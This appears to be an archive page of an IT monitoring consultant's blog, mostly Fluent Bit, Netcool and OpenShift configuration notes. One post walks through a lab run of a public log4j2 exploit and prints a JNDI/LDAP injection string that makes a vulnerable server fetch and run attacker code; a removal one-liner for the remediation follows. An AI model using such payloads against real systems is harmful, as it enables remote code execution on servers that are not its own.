Tuesday, March 14, 2023
Installing the ELK stack and Fluent-Bit on Minikube on Ubuntu 20.04
Monday, March 13, 2023
Installing Minikube and Prometheus on Ubuntu 20.04 as of 3/11/2023
Background
Solution
Monday, February 13, 2023
Recent versions of the Netcool Message Bus Probe support Kafka
We are working with a client who needed to send events from their cloud-native application to their legacy on-prem netcool Operations Insight implementation. After researching a bit, we found that their application was already writing the events of interest to a Kafka topic. The only issue was that they had an old version of the Message Bus Probe. So we installed version 21 of the probe and used the included Nokia NFMP files as a starting point to configure the probe to pull the events from this topic so that they could be processed by Netcool.
Reach out to us if you're using Netcool/Watson AIOps and need some help working through some obstacles.
Friday, February 10, 2023
The Fluent Bit rewrite_tag filter doesn't fully work until version 1.8.12
I'm working with a client who has a packaged Kubernetes distribution installed that includes Fluent Bit 1.8.3. I tried the config from my last blog post on their system, and it just does NOT work as expected. In their system, it creates a new message with the new tag, but then none of the subsequent filters are applied. I had been working in the latest version (2.0.9), and everything worked like a champ. So I downloaded 1.8.3 and found that the same configuration didn't work. It seemed to partially call the rewrite_tag filter (if I set KEEP to false, it would delete the message, but if I set KEEP to true, it did nothing). The test configuration they suggest, using an input of type Dummy actually works exactly as expected. But the problem seems to be when you have an Input of type tail. And there is no workaround other than upgrading to a newer version. I actually downloaded and tested 1.8.4 through 1.8.12 before it worked correctly. So my client is now working on upgrading to a newer version.
Wednesday, February 8, 2023
Configuring Fluent Bit to send messages to the Netcool Mesage Bus probe
Background
Fluent Bit is an open source and multi-platform log processor tool which aims to be a generic Swiss knife for logs processing and distribution.
It is included with several distributions of Kubernetes, and is used to pull log messages from multiple sources, modify them as needed, and send the records to one or more output destinations. It is amazingly customizable, so you can do just about any processing you want, with a couple of idiosyncracies, one of which I'll describe here.
The Challenge
What if you have a log message that you want to handle in two different ways:
1. Normalize the fields in the log message for storage in ElasticSearch (or Splunk, etc.).
2. Modify the log message so it has all of the appropriate fields needed for processing by your Netcool environment (fields that you don't necessarily want in your log storage system).
The Solution
Here's a high-level graphic showing what we're going to do:
Our rewrite_tag FILTER is going to match all tags beginning with "kub". This will exclude our new tag, which will be "INC". So after the rewrite_tag filter, there will be two messages in the pipeline: the original plus our new one with our custom "INC" tag. We can the specify the appropriate Match statements in later FILTERs to only match the appropriate tag. So in the ES output above, the Match_Regex statement is:
Match_Regex ^(?!INC).*
The official name of the above is a "lookahead exclude". Go ahead and try it out at regex101.com if you want. It will match any tag that does NOT begin with "INC", which is the custom tag for our new messages that we want to send tou our HTTP Message Bus probe.
The rewrite_tag FILTER will be custom for your environment, but the following may be close in many cases. For my case, I want to match any message that has a log field containing the string "ERROR writing to". You'll have to analyze your current messages to find the appropriate field and string that you're interested in. But here's my rewrite_tag FILTER stanza:
[FILTER]
Name rewrite_tag
Match_Regex ^(?!INC).*
Rule $log ^.*Error\swriting\sto.* INC true
The "Rule" statement is the tricky part here. This statement consists of 4 parts, separated by whitespace:
Rule - the literal string "Rule"
$log - the name of the field you want to search to create a new message, preceded by "$". In this case, we want to search the field named log.
^.*Error\swriting\sto.* - the regular expression we want to match in the specified field. This regular expression CANNOT CONTAIN SPACES. That's why I'm using "\s".
INC - this is the name of the tag to set on the new message. This tag is ONLY used within the Fluent Bit pipeline, so it can literally be anything you want. I chose "INC" because these messages will be sent to the Message Bus proble to eventually create incidents in ServiceNow.
true - this specifies that we want the KEEP the original message. This allows it to continue to be processed as needed.
After you have the rewrite_tag FILTER in place, you will have at least one additional FILTER of type "modify" in your pipeline to allow you to add fields, rename fields, etc. You'll then have an OUTPUT stanza of type "http" to specify the location of the Message Bus probe. Something like the following:
[OUTPUT]
Name http
port 80
Match INC
host probehost
uri /probe/webhook/fluentbit
format json
json_date_format epoch
The above specifies that the URL that these messages will be sent to is
http://probehost:80/probe/webhook/fluentbit
In the json that's sent in the body of the POST request, there will be a field named date , and it will be in Unix "epoch" format, which is an integer representing the number of seconds since the beginning of the current epoch (a "normal" Unix/Linux timestamp).
That's it. That's all of the basic configuration needed on the Fluent Bit side.
Extra Credit/TLS Config
Wednesday, November 30, 2022
How to download a specific version of the OpenShift installer and client
Go here: https://mirror.openshift.com/pub/openshift-v4/clients/ocp . Select the version you want and you're good to go!
Wednesday, August 24, 2022
An Example of a Useful Notification Email
You should have monitors in place to detect problems in your enterprise. These can be individual monitors defined for an agent, or queries/thresholds defined for data collected by an observability platform. Either way, at some point, you need to notify someone about what went wrong.
The following is an email notification we set up for a customer:
The important things to note are:- What failed? The "Tivoli CTH Health Check" failed in PROD.
- What needs to be done? Run all of the checks that are listed at the end of the email.
Friday, May 6, 2022
The Cylance Smart Antivirus agent will ruin your day
I am currently helping a customer move their ITM 6 infrastructure from AIX to Red Hat 8, and the largest hurdle has been the Cylance agent. When doing any kind of enterprise install, my first step is to copy the install files to all of the servers (in this case it is 16 servers: 2 HUB TEMS, 12 RTEMS, 2 TEPS). In its default configuration, the Cylance agent will remove files that it determines are suspicious. In my case, that means that it deleted one or two tar files, and would re-delete them whenever I copied them over again. The cylance log under /opt/cylance/desktop/log showed exactly what it was doing, so we were able to work with the Cylance team to correct this.
After the delete issue was resolved, we found that the Cylance agent was stopping some executables from running, with just a "Segmentation fault" error, and the error still existed after stopping the Cylance agent. This is because even though the agent wasn't running, it has hooks into kernel system calls that leverage a local cache. That took a while to resolve, but we finally got all of the appropriate directories whitelisted.
The last problem encountered was with the Cylance agent's Memory Protection feature. In this case, it caused 'tacmd tepslogin' to fail with a bunch of text to the command line and no information in the normal ITM logs. Looking in the Cylance log file again, I could see that it was blocking some memory action performed by the ITM java executable. That now seems to be resolved.
Hopefully this short post can help others identify these types of issues before throwing their server out the window.
Tuesday, January 25, 2022
Configuring certificates for the Netcool email probe when using Office365
Background
Solution
cd /tmp
for i in file{1..100}
do
openssl s_client
-showcerts -verify 5 -connect outlook.office365.com:995 < /dev/null > $i
# each file contains at
least two certificates. Each certificate needs to be in its own file
# to import it into the
keystore. That's what the following command does. It will create
# files named file*-00,
file*-01, file*-02 if there are two certificates returned by the above
# command.
csplit -f $i- $i '/-----BEGIN
CERTIFICATE-----/' '{*}'
# file*-00 doeesn't
contain anything useful (certs are in *-01 and *-02), so we will delete it
rm file*-00
done
# now import all of the
above certs into the keystore.
for i in file*-*
do
keytool -keystore "/opt/IBM/tivoli/netcool/core/certs/key_netcool.jks" -import \
-trustcacerts
-alias $i -file $i -noprompt -storepass
THE_KEYSTORE_PASS
done
Friday, January 7, 2022
10 Things to Avoid Doing in MS Excel and Their Alternatives
Microsoft Excel is an amazingly powerful tool that has more capabilities than most people can imagine. Today I ran across this video that covers 10 different things to avoid doing in Excel to help make working with your data easier.
Tuesday, December 28, 2021
The best video I've ever seen for learning Regular Expressions
I've worked with regular expressions for a long time now, and I'm always working on getting better at them. I ran across this 20-minute YouTube video and was really blown away by how quickly it explains everything you need to know about regular expressions. I highly recommend it.
Many of his other videos are also worth your time.
One huge caveat aimed at those in the world of Enterprise Software:
Not all products support all features of the regular expressions described in the video, and there are often nuances to the exact functions that are supported. For example, the following features described in the video aren't supported by various versions of *some* components of Netcool and ServiceNow, depending on which regex engine they use:
- look-ahead and look-behind operations
- named groups
Because of cases like this, I always recommend that you try to accomplish your goal using the simplest regular expression features as possible, and always test your regular expressions. Regexr.com is the site used in the video, and it is very powerful, but it appears to support the latest and greatest JavaScript regular expressions, with no way to change that. Regex101.com is the site I normally use, and it allows you to select one of several "flavors" of regular expressions.
Monday, December 20, 2021
The Zero-click exploit that Google researchers say is 'the most technically sophisticated exploit ever seen'
In contrast to the trivially-exploitable Log4j2 exploit, here's a zero-click exploit from NSO group. Here's an article describing it in understandable terms first:
https://www.engadget.com/google-researchers-nso-zero-click-iphone-imessage-exploit-143213776.html
And here are the technical details:
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Tuesday, December 14, 2021
Interesting article on the new frontier of botnets identifying C2 servers using "memo" data in blockchain transactions between known wallets
The title tells you the gist of the story, but here's the full article:
https://gizmodo.com/how-cybercriminals-are-using-bitcoins-blockchain-to-mak-1848189767
Basically, the botnet code is written such that if its current C2 (Command and Control) server is down, it will search the public blockchain for transactions between known wallets. Every transaction can have an optional "memo" field, which is where the botnet controllers put the address of other C2 servers.
Example and video of log4j2 exploit
This is a great example of the exploit in action:
https://github.com/ilsubyeega/log4j2-exploits
Here's the video showing it in action:
You can run it yourself. On Linux, you'll first have to install the following prereqs:
node
npm
gradle
default-jdk
And you'll also need to modify Main.java before compiling to change the line:
Runtime.getRuntime().exec("cmd.exe /c start echo Exploit");
to
Runtime.getRuntime().exec("gnome-terminal");
The pieces that are provided for the exploit are:
- An HTTP server that would be owned by the attacker in the wild. This hosts the Main.class file that is going to display a new window on the server when the exploit fires.
- An LDAP server that would be owned by the attacker in the wild. This is the server queried by the vulnerable JndiLookup.class file, which includes a link to the HTTP server.
- A JVM that represents an application server like WebSphere or Tomcat
Once you feed the JVM the userr-controlled string "${jndi:ldap://127.0.0.1:3001/}", you'll see that the JVM spits out errors, but still successfully opens a new window. In the wild, this window represents ANY COMMAND THE ATTACKER WANTS TO RUN ON THE SERVER, and it's running as the same userid that's running the JVM.
Basically, if you didn't already know, this is the worst, and most easily exploited vulnerability that's been found in the wild in a long time.
Monday, December 13, 2021
Quickest log4j2 vulnerability remediation I've found on Linux
Quickest Linux fix I've found for the #log4j2 vulnerability:
find / -name "log4j-core-*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;
reboot
The above command will find all files named "log4j-core-*.jar" on the system and will remove the "JndiLookup.class" file from them. The 'reboot' is a fairly large hammer, but it will restart all processes on the box. Alternatively, you can stop and restart all java processes running on the server.
Tuesday, October 26, 2021
Converting timestamp in milliseconds to seconds in Netcool probe rules
Background
Conversion Process
Wednesday, September 22, 2021
Using VSCode to write Netcool Probe Rules and Impact Policies
VSCode is Microsoft's free, cross-platform IDE for software development. It is booming in popularity recently because it is an amazing tool with lots of plugins. These plugins provide all kinds of different functionality. The ones I want to introduce to you today are syntax highligting plugins that provide syntax highlighting and syntax validation for Impact Policy Language (IPL) and Netcool Probe Rules Language.
Here's an example from the Probe Rules extension:
Compared to the vi editor or Notepad++, this is a HUGE improvement.
Wednesday, May 5, 2021
ServiceNow Quebec Release Netcool Connector V2 Implemented in JavaScript
Background
Prior to the Quebec Release, the Netcool Connector was only available as a Groovy script. In the Quebec release, ServiceNow offers BOTH the legacy Groovy connector and a new JavaScript-based connector. This new connector is named IBM Netcool V2. This new connector leverages the OMNIbus REST API for retrieving and updating events, whereas the legacy Groovy script directly connects to the ObjectServer database to perform these operations.
Monday, March 22, 2021
vCenter Appliance "tiny" Size Is Not Enough for Creating OpenShift Cluster
I just tried to create an OpenShift 4.7 cluster using a vCenter appliance that was configured with the "tiny" size from the installer. This gives it 2 vcpus and 10GB RAM. I was using Installer Provided Infrastructure (IPI) on vSphere 6.7. The cluster creation failed with a timeout. I looked at the vCenter server performance stats and saw that it was using all of its CPU and memory. So I destroyed the cluster and doubled the resources on the vCenter VM. I then ran the cluster creation again, and everything completed as expected.
Wednesday, March 17, 2021
Overprovisioning vCPUs in ESXi as a VMWare guest
Background
Solution
As you can see, my ESXi guest (32 vCPUs) has three guest VMs that are using a total of 42 vCPUs, and they're all running fine. If all of the vCPUs get busy, performance will degrade, but I don't expect that to ever happen in my lab.
Tuesday, March 16, 2021
Troubleshooting Red Hat CodeReady Containers
Background
Environment
Guest VM
crc VM log file
virsh command
virsh list --all
virt-manager
You can then click on the crc VM to see the console. There is no way to actually log into the crc VM because you can only log in via the core user's private key (shown later). Googling around, I see that password access has been requested/suggested, but there appears to be no plan to implement it at this time.
crc VM
crc pods log files
ssh -i ~/.crc/machines/crc/id_ecdsa core@api.crc.testing



